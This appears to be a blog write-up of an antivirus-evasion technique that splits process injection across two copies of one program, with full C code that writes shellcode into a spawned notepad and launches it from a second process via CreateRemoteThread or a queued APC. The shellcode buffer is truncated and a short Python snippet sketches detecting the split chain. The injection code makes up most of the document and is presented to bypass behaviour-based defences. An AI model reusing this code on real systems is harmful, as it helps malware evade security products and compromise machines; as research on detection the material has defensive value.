# Divide and Conquer

## Introduction

I came across a rather interesting technique. Today's AV products pay attention to the chain of function calls a process makes; [theevilbit](https://gist.github.com/theevilbit) published a method that splits the API calls across separate processes to bypass behaviour-based AV detection.

Common behaviour-based detection monitors the call chain on the stack and hooks APIs to record behaviour; this split-execution approach gets past both.

## Procedure

1. Create a puppet process
2. Write the payload into the puppet process
3. Create a second process from the same executable, passing it the pid
4. Open a handle to the puppet via the pid
5. Create a remote thread
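As an added example (not from the original post or the linked gist), here is the defender's side of the argument above: an actor-centric rule sees only half of the chain in each process, while a target-centric correlation pairs the process that wrote into the puppet with the different process that started execution there and checks whether the two are parent and child. The telemetry records, event names and pids are constructed.

```python
from collections import defaultdict
# Constructed sample telemetry, not from the original post. Each record is
# (event, actor_pid, target_pid); event names and pids are hypothetical.
EVENTS = [
    ("ProcessCreate", 100, 200),  # step 1: injector spawns the puppet
    ("RemoteAlloc",   100, 200),  # step 2: VirtualAllocEx into the puppet
    ("RemoteWrite",   100, 200),  # step 2: WriteProcessMemory into the puppet
    ("ProcessCreate", 100, 300),  # step 3: injector re-launches itself with the pid
    ("RemoteThread",  300, 200),  # step 5: the second copy starts the thread
    ("RemoteWrite",   400, 500),  # unrelated pair: one process does both steps
    ("RemoteThread",  400, 500),
]

WRITE = {"RemoteAlloc", "RemoteWrite"}
EXEC = {"RemoteThread", "ThreadResume", "QueueAPC"}

def per_actor_chains(events):
    """Actor-centric rule: flag (actor, target) pairs where one process both
    wrote into the target and started execution there. Splitting the steps
    across two processes leaves no single actor with the full chain."""
    steps = defaultdict(set)
    for ev, actor, target in events:
        steps[(actor, target)].add(ev)
    return {k for k, s in steps.items() if s & WRITE and s & EXEC}

def split_chains(events):
    """Target-centric rule: for each injected-into process, pair every writer
    with every different executor and note whether the two actors are related
    (parent/child or siblings), which is the shape of this technique."""
    parent, steps = {}, defaultdict(lambda: defaultdict(set))
    for ev, actor, target in events:
        if ev == "ProcessCreate":
            parent[target] = actor
        else:
            steps[target][actor].add(ev)
    findings = []
    for target, by_actor in steps.items():
        writers = {a for a, s in by_actor.items() if s & WRITE}
        executors = {a for a, s in by_actor.items() if s & EXEC}
        for w in writers:
            for e in executors - {w}:
                related = (parent.get(e) == w or parent.get(w) == e
                           or (w in parent and parent[w] == parent.get(e)))
                findings.append({"target": target, "writer": w,
                                 "executor": e, "related": related})
    return findings

if __name__ == "__main__":
    print(per_actor_chains(EVENTS))  # {(400, 500)}: the split chain is missed
    print(split_chains(EVENTS))      # one finding: target 200, writer 100, executor 300
```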

## Code

```c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

// Shellcode bytes; the buffer is truncated on this page (the full one is in the linked gist).
unsigned char shellcode[] =
"\xfc78\x00";

int main(int argc, char* argv[]) {

    if (argc < 2)
    {
        // First copy: spawn the puppet, allocate and write the payload at a fixed
        // address both copies agree on, then launch a second copy of this
        // executable with only the puppet's pid on its command line.
        STARTUPINFOA si = { 0 };
        si.cb = sizeof(si);
        PROCESS_INFORMATION pi = { 0 };

        CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
        VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);

        char cmd[MAX_PATH] = { 0 };
        wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);

        CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    }
    else
    {
        // Second copy: open the puppet by pid and start the thread. It never wrote
        // to the puppet's memory, so its own call chain is only half of the pattern.
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
        CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, NULL, 0, NULL);
    }

    return 0;
}
```

![](/files/-MRY9PzWigSjH0bCJvCP)

## Same Idea, APC Variant

```c
// This replaces the body of main() in the program above; the includes and
// the shellcode buffer are unchanged.
    if (argc < 2)
    {
        STARTUPINFOA si = { 0 };
        si.cb = sizeof(si);
        PROCESS_INFORMATION pi = { 0 };

        // The puppet starts suspended so its main thread has not run yet.
        CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
        VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
        char cmd[MAX_PATH] = { 0 };
        // This time the puppet's main thread id is passed, not its pid.
        wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
        // Queue the payload as a user APC on the suspended thread.
        QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, 0);
        CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
    }
    else
    {
        // Second copy: only resume the thread; the queued APC runs when it starts.
        HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, atoi(argv[1]));
        ResumeThread(hThread);
    }
```

![](/files/-MRYJ0YPXyQtTwUSZGPB)

## Link

[theevilbit's gist](https://gist.github.com/theevilbit/073ca4eb15383eb3254272fc24632efd)
